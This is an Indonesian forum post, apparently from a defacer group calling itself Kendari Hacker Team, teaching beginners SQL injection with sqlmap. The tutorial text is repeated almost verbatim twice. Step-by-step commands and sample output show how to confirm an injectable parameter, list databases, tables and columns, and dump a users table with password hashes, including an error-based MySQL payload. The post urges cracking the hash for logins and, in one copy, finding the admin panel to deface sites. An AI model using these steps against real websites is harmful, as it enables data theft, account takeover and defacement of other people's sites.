- Beranda
- Komunitas
- Tech
- Website, Webmaster, Webdeveloper
SQL injection Dengan Sqlmap for (Pemula)


TS
Injectx
SQL injection Dengan Sqlmap for (Pemula)
Assalamualaikum Sobat Sobat Kendari. Dimapun .Anda Berada 
Website kendari hacker gan☺
Kembali Lagi dengan Ane. InjectX
Semoga Kalian Senantiasa Diberi Kesehatan Oleh Tuhan yaa.
kali Ini InjectX
Akan Membawakan Tutorial Sql Injection Dengan Menggunakan Tools Sqlmap.
Katakanlah anda memiliki web atau Target yang memiliki url di dalamnya seperti ini
http://www.site.com/vuln.php?id=51
dan rentan terhadap injeksi sql karena pengembang situs tersebut tidak melepaskan id parameter dengan benar. Ini dapat dengan mudah diuji dengan mencoba Memasukan (') Di akhir parameter.
http://www.site.com/vuln.php?id=51 '
Anda baru saja menambahkan satu kutipan di parameter. Jika url ini melontarkan kesalahan atau Pesan yang Menampilan Pesan Seperti Ini
" syntax error" Atau bereaksi dengan cara yang tidak terduga maka jelas bahwa database telah
mendapatkan kutipan tunggal yang tidak terduga yang aplikasi tidak lolos dengan benar. Jadi dalam hal ini parameter input "id" rentan terhadap injeksi sql.
Meretas dengan sqlmap Atau Manual Dengan Menggunakan trick Sql with Dios (Dump In one Shot)
Sekarang saatnya beralih ke sqlmap untuk meretas target anda. Perintah sqlmap dijalankan dari terminal dengan interpreter python.
Untuk Windows: cd:/dirdimanafilesqlmapdisimpan/sqlmap/sqlmap.py
Untuk Linux : python2 sqlmap.py
python sqlmap.py -u "http://www.site.com/vuln.php?id=51"
Di atas adalah perintah pertama dan paling sederhana untuk dijalankan dengan alat sqlmap. Command Itu Berfungsi untuk memeriksa parameter masukan untuk menemukan apakah mereka rentan terhadap injeksi sql atau tidak. Untuk sqlmap ini mengirimkan berbagai jenis muatan injeksi sql ke parameter input dan memeriksa output.
Dalam prosesnya sqlmap juga dapat mengidentifikasi os sistem jarak jauh, nama database dan versinya. Bahkan Yang Lebih Parahnya Bisa MengRemote Sebuah Website Dari Jarak Jauh. (Upload Shell WithOut Admin Panel) Tanpa Melakukan Login Kedalam website.
Berikut adalah tampilan keluarannya:
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
Setelah sqlmap mengkonfirmasi bahwa url jarak jauh rentan terhadap injeksi sql dan dapat dieksploitasi, langkah selanjutnya adalah menemukan nama-nama Databese yang ada pada sistem jarak jauh. Opsi "--dbs" digunakan untuk mendapatkan daftar database.
$ python sqlmap.py -u "http://www.sitemap.com/vuln.php?id=51" --dbs
Dan Output Akan Menampilkan Ini
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
Outputnya menunjukkan database yang ada pada sistem Website Target.
Mencari tabel dalam database.
Sekarang waktunya untuk mencari tahu tabel apa saja yang ada di database tertentu. Katakanlah database yang menarik di sini adalah 'safecosmetics'
command:
python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics --table
dan hasilnya seperti ini:
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
Sekarang Anda Sudah Mendapatkan daftar Tables Dalam databese web Target anda.
Mendapatkan Column Dari Tables
Sekarang setelah kita memiliki daftar tabel, akan menjadi Jalur Masuk yang baik untuk mendapatkan kolom dari beberapa tabel penting. Katakanlah tabel tersebut adalah 'pengguna' Atau 'Admin' dan berisi nama pengguna dan kata sandi.
command:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics -T users --column
Dan Hasilnya Seperti Ini:
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+
Jadi sekarang kolomnya terlihat jelas. Anda Bisa Memanfaatkan Data Tersebut Untuk Berbagai Hal
Dapatkan data dari tabel
Sekarang sampai pada bagian paling menarik, mengekstraksi data dari tabel. Commandnya Adalah:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics -T users -C Name,password --dump
Perintah di atas hanya akan mengambil data dari tabel tertentu, mirip dengan perintah mysqldump.
Outputnya akan Terlihat Seperti ini:
+----+--------------------+-----------+-----------+----------------------
| id | hash | name | |password
+----+--------------------+-----------+----------------------------------
| 1 | 5DIpzzDHFOwnCvPonu | admin | bf9d06d8b1aee59b19004f486ae0de3a
+----+--------------------+-----------+-----------------------------------
Kolom Password tampaknya memiliki hash kata sandi. Coba pecahkan hash dan Anda akan segera mendapatkan detail login. Setelah Di Hash Passwordnya Adalah " Kendari Hacker Team" sqlmap akan membuat file csv yang berisi data dump untuk memudahkan analisis.
Apa Selanjutnya?
Langkah Selanjutnya Adalah Ada di Dalam Genggaman tangan Anda
. tapi Jika ingin Mendeface suatu Situs Dengan Menggunakan Cara Ini. Saya sarankan Mending mencari Admin Loginnya Terlebih dahulu...
Terima Kasih. ☺
++++++++++++++++++++++++++++++++++++++++
Kendari-Hacker-Team
- InjectX - k4tsuy4-Gh05t - MalaikatHati Defacer Sakit Hati

Website kendari hacker gan☺
Kembali Lagi dengan Ane. InjectX
Semoga Kalian Senantiasa Diberi Kesehatan Oleh Tuhan yaa.

kali Ini InjectX
Akan Membawakan Tutorial Sql Injection Dengan Menggunakan Tools Sqlmap.
Katakanlah anda memiliki web atau Target yang memiliki url di dalamnya seperti ini
http://www.site.com/vuln.php?id=51
dan rentan terhadap injeksi sql karena pengembang situs tersebut tidak melepaskan id parameter dengan benar. Ini dapat dengan mudah diuji dengan mencoba Memasukan (') Di akhir parameter.
http://www.site.com/vuln.php?id=51 '
Anda baru saja menambahkan satu kutipan di parameter. Jika url ini melontarkan kesalahan atau Pesan yang Menampilan Pesan Seperti Ini
" syntax error" Atau bereaksi dengan cara yang tidak terduga maka jelas bahwa database telah
mendapatkan kutipan tunggal yang tidak terduga yang aplikasi tidak lolos dengan benar. Jadi dalam hal ini parameter input "id" rentan terhadap injeksi sql.
Meretas dengan sqlmap Atau Manual Dengan Menggunakan trick Sql with Dios (Dump In one Shot)
Sekarang saatnya beralih ke sqlmap untuk meretas target anda. Perintah sqlmap dijalankan dari terminal dengan interpreter python.
Untuk Windows: cd:/dirdimanafilesqlmapdisimpan/sqlmap/sqlmap.py
Untuk Linux : python2 sqlmap.py
python sqlmap.py -u "http://www.site.com/vuln.php?id=51"
Di atas adalah perintah pertama dan paling sederhana untuk dijalankan dengan alat sqlmap. Command Itu Berfungsi untuk memeriksa parameter masukan untuk menemukan apakah mereka rentan terhadap injeksi sql atau tidak. Untuk sqlmap ini mengirimkan berbagai jenis muatan injeksi sql ke parameter input dan memeriksa output.
Dalam prosesnya sqlmap juga dapat mengidentifikasi os sistem jarak jauh, nama database dan versinya. Bahkan Yang Lebih Parahnya Bisa MengRemote Sebuah Website Dari Jarak Jauh. (Upload Shell WithOut Admin Panel) Tanpa Melakukan Login Kedalam website.
Berikut adalah tampilan keluarannya:
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
Setelah sqlmap mengkonfirmasi bahwa url jarak jauh rentan terhadap injeksi sql dan dapat dieksploitasi, langkah selanjutnya adalah menemukan nama-nama Databese yang ada pada sistem jarak jauh. Opsi "--dbs" digunakan untuk mendapatkan daftar database.
$ python sqlmap.py -u "http://www.sitemap.com/vuln.php?id=51" --dbs
Dan Output Akan Menampilkan Ini
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
Outputnya menunjukkan database yang ada pada sistem Website Target.
Mencari tabel dalam database.
Sekarang waktunya untuk mencari tahu tabel apa saja yang ada di database tertentu. Katakanlah database yang menarik di sini adalah 'safecosmetics'
command:
python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics --table
dan hasilnya seperti ini:
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
Sekarang Anda Sudah Mendapatkan daftar Tables Dalam databese web Target anda.
Mendapatkan Column Dari Tables
Sekarang setelah kita memiliki daftar tabel, akan menjadi Jalur Masuk yang baik untuk mendapatkan kolom dari beberapa tabel penting. Katakanlah tabel tersebut adalah 'pengguna' Atau 'Admin' dan berisi nama pengguna dan kata sandi.
command:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics -T users --column
Dan Hasilnya Seperti Ini:
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+
Jadi sekarang kolomnya terlihat jelas. Anda Bisa Memanfaatkan Data Tersebut Untuk Berbagai Hal

Dapatkan data dari tabel
Sekarang sampai pada bagian paling menarik, mengekstraksi data dari tabel. Commandnya Adalah:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=51" -D safecosmetics -T users -C Name,password --dump
Perintah di atas hanya akan mengambil data dari tabel tertentu, mirip dengan perintah mysqldump.
Outputnya akan Terlihat Seperti ini:
+----+--------------------+-----------+-----------+----------------------
| id | hash | name | |password
+----+--------------------+-----------+----------------------------------
| 1 | 5DIpzzDHFOwnCvPonu | admin | bf9d06d8b1aee59b19004f486ae0de3a
+----+--------------------+-----------+-----------------------------------
Kolom Password tampaknya memiliki hash kata sandi. Coba pecahkan hash dan Anda akan segera mendapatkan detail login. Setelah Di Hash Passwordnya Adalah " Kendari Hacker Team" sqlmap akan membuat file csv yang berisi data dump untuk memudahkan analisis.
Apa Selanjutnya?
Langkah Selanjutnya Adalah Ada di Dalam Genggaman tangan Anda

Terima Kasih. ☺
++++++++++++++++++++++++++++++++++++++++
Kendari-Hacker-Team
- InjectX - k4tsuy4-Gh05t - MalaikatHati Defacer Sakit Hati
Diubah oleh Injectx 04-10-2020 21:36
0
1.2K
1


Komentar yang asik ya
Urutan
Terbaru
Terlama


Komentar yang asik ya
Komunitas Pilihan